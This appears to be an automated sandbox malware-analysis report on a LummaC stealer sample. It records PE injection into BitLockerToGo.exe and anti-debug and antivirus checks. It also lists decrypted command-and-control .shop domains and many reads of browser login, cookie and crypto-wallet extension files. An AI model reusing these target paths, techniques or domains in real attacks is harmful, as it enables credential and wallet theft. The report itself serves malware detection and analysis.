              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-11453
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00267840 LdrInitializeThunk,3_2_00267840

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 230000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 230000 value starts with: 4D5AJump to behavior
              LummaC encrypted strings found
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: benchillppwo.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: publicitttyps.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: answerrsdo.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: radiationnopp.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: affecthorsedpo.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: bargainnykwo.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: bannngwko.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: bouncedgowp.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: citizencenturygoodwk.shop
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 230000Jump to behavior
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 24B7008Jump to behavior
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 3800, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: BitLockerToGo.exe, 00000003.00000003.2290216843.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: BitLockerToGo.exe, 00000003.00000003.2290216843.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: BitLockerToGo.exe, 00000003.00000003.2290216843.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000003.00000003.2227392089.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletD
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: BitLockerToGo.exe, 00000003.00000003.2227392089.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: BitLockerToGo.exe, 00000003.00000003.2290216843.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: BitLockerToGo.exe, 00000003.00000003.2227392089.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
